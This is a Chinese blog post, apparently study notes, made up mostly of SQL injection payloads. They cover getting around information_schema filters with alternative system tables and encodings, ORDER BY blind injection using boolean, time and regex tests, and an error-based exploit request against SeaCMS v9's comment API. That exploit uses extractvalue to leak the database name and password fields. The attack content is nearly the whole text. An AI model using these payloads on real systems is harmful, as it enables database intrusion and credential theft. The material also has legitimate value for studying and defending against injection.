当前位置: 首页 > news >正文

order by、limit、seacmsv9联合注入数据

1、绕过information_schema过滤

1.1替代系统表/视图
-- 使用sys库(MySQL 5.7+)
SELECT table_name FROM sys.schema_auto_increment_columns 
WHERE table_schema = DATABASE();

-- 使用InnoDB统计表
SELECT table_name FROM mysql.innodb_table_stats 
WHERE database_name = DATABASE();

1.2使用 mysql.innodb_table_stats

SELECT table_name FROM mysql.innodb_table_stats WHERE database_name = DATABASE();

1.3使用 mysql.tables_priv

SELECT table_name FROM mysql.tables_priv WHERE db = DATABASE();

1.4编码混淆技术

编码实列
 URL 编码
SELECT table_name FROM %69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61.tables WHERE table_schema=DATABASE();
Unicode 编码
SELECT table_name FROM information\u005f_schema.tables WHERE table_schema=DATABASE();
十六进制编码
SELECT table_name FROM 0x696e666f726d6174696f6e5f736368656d61.tables WHERE table_schema=DATABASE();

 

二、绕过ORDER BY注入限制

2.1 联合查询注入
UNION SELECT 1,2,(SELECT table_name FROM information_schema.tables LIMIT 1) -- 
2.2盲注技术对比
类型示例
布尔盲注ORDER BY IF(ASCII(SUBSTR(DATABASE(),1,1))=97,1,2)
时间盲注ORDER BY IF(ASCII(SUBSTR(DATABASE(),1,1))=97,SLEEP(5),1)
正则匹配ORDER BY (SELECT table_name) REGEXP '^a'
2.3分页提取数据
ORDER BY (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0);

三、Seacmsv9报错注入

3.1 漏洞利用过程
GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,
extractvalue(1,concat_ws(0x20,0x5c,database())),@`%27`
3.2 报错结果分析
<!-- 成功会显数据库名 -->
<error>XPATH syntax error: '\ test_db'</error>

<!-- 密码字段截断处理 -->
extractvalue(1,concat_ws(0x20,0x5c,mid((SELECT password),1,30)))

3.3concat_ws和 concat的区别

特性CONCATCONCAT_WS
空值处理任一参数为NULL则返回NULL自动跳过NULL值
分隔符首个参数为分隔符
使用场景简单的字符串拼接需要分隔符的字符串拼接(如日期、路径)

相关文章:

  • go设计模式
  • 1688订单管理接口的功能与应用场景
  • 算法之排序算法
  • Oracle数据库的启动与关闭
  • `maturin`是什么:matu rus in python
  • 基于 Vllm 在linux 私有化部署DeepSeek-R1以及使用RESTful API的方式使用模型
  • 宝塔webhooks与码云实现自动部署
  • Cursor配置MCP Server
  • RabbitMQ系列(三)基本概念之Consumer
  • Python:字符串编码,常见操作,列表及常见操作
  • Linux系统软件管理
  • DeepSeek 开源狂欢周(一)FlashMLA:高效推理加速新时代
  • nacos数据同步原理能说下吗?
  • Django基础环境准备
  • 基因型—环境两向表数据分析——品种生态区划分
  • AI技术为旅行社打开新流量入口
  • python-leetcode-使用最小花费爬楼梯
  • 【JSON2WEB】15 银河麒麟操作系统下部署JSON2WEB
  • 【计算机网络】TCP三次握手,四次挥手以及SYN,ACK,seq,以及握手次数理解
  • Opencv之sift特征检测和FLANN 匹配器进行指纹特征匹配
  • 宜昌 网站建设/一键制作免费网站的app
  • 网盟推广是什么/广丰网站seo
  • wordpress logo设置/上海关键词优化排名软件
  • 广州最靠谱的装修公司/网站优化排名软件网
  • 宝鸡网站建设求职简历/萧山市seo关键词排名
  • wordpress 插件出错/搜索优化seo